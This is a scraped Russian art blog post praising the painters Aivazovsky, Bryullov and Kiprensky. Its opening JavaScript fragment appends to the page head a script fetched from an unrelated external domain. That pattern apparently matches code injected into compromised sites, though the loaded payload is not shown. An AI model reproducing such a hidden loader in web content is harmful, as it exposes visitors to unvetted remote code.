, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Великие художники

Автор: Дмитрий Алмазов | 30 Апр 2013

картина Девятый валВеликие художники были на протяжении всей истории России, и их работы радуют наш взор по сей день. У каждого из них своя манера исполнения, своя техника, свой жанр, но при этом каждый из них великолепен по-своему.

Великий маринист, Иван Айвазовский (Ованнес Айвазян), известный по картинам «Девятый вал», «Радуга» и многим другим, с отличием закончил Академию художеств в Петербурге, затем был командирован в Крым. Именно там он начал писать виды приморских городов. Путешествуя на боевых кораблях, художник завел знакомства с известными адмиралами, а также здесь определилась специфика его творчества. Не менее яркий след в творениях Айвазовского оставили поездки в Италию, Францию, Великобританию. Благодаря работе в этих странах, художник вернулся в Россию уже известным живописцем, ставшим членом нескольких академий. Многочисленным регалиям и работе художником в главном военно-морском штабе Айвазовский предпочел оторванный от цивилизации дом-студию на берегу моря в Феодосии. Здесь он по-настоящему чувствовал себя свободным в выборе сюжета для новых полотен. Автор считал, что невозможно изобразить море таким, какое оно есть, поэтому никогда не писал его с натуры, поддаваясь собственным грезам, в которых представлялась водная стихия. Художник работал в стиле романтизма. Так, Айвазовский в своих работах запечатлел безграничность природы, ее великую силу, с которой борется человек. Неслучайно значительная часть его картин посвящена шторму. Удивительное, необъятное и могучее море на полотнах художника принесли ему мировую известность.

Последний день ПомнейЕще одним дарованием, воспитанным Петербургской Академией художеств, по праву можно назвать Карла Брюллова. В его работах просматривается тонкое чувство формы, что порождает пластичность изображений. После окончания Академии у художника возникает большой интерес к портрету, хотя в учебном заведении этот жанр признавался низким родом живописи. Брюллову удается в своих работах отойти от классицизма и внести в творчество мотивы романтизма. Также благодаря программе поддержки молодых художников, Карлу посчастливилось поработать в Италии, где он с успехом писал портреты на заказ. Но вскоре творец захотел полностью погрузиться в мир искусства без предварительных заказов, писать то, что хочется ему, а не то, что диктует заказчик. Одной из самых известных работ художника стала картина «Последний день Помпеи», которая сразу же принесла Брюллову триумфальную славу. Десятки тысяч людей спешили в его мастерскую, чтобы полюбоваться шедевром. Так живописца стали узнавать на улицах, ему поступало много интересных предложений. Не меньшую известность мирового уровня мастеру принесло его портретное наследие. За всю свою творческую жизнь Брюллов завоевал мировые почести, его имя звучало наравне с такими художниками как Рубенс и Рембрандт.

Портрет ШвальбеПрославленным портретистом рубежа 18-19 вв. заслуженно можно назвать Ореста Кипренского. Истинное признание он получил за великолепные тонко прописанные портреты, в которых отражается красота волнения, утонченный внутренний мир образов. При этом в каждой работе художник открывает все новые человеческие качества. Первым портретом, который прославил художника именно портретистом, стал «Портрет А.К. Швальбе». Сам художник заявлял, что портретная живопись для него была источником заработка, а призванием своим он провозглашал историческую живопись, порываясь писать масштабные сюжетные произведения. Однако яркую сторону своего творческого потенциала он раскрыл именно в портрете. Каждый его портрет отличается новым художественным видение, неповторимым контрастом, тонким сочетанием света и тени. Работы Кипренского побывали в Италии, где получили большое признание. В истории России живописец занял особое место среди мастеров портретного жанра.
Музей Цветаевых в Феодосии - «Волошину я обязана первым самосознанием себя как поэта», - написала Марина Цветаева в очерке «Живое о живом».

Наша страна может гордиться богатым историческим культурным наследием в области живописи. Такие художники, как Айвазовский, Брюллов, Кипренский, оставили яркий след в мировом искусстве, внеся неповторимые элементы  в изображение пейзажей и портретов. Живописцы действительно были новаторами и асами своего жанра, почему и достойны гордого звания великих художников.

Темы: Художник | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress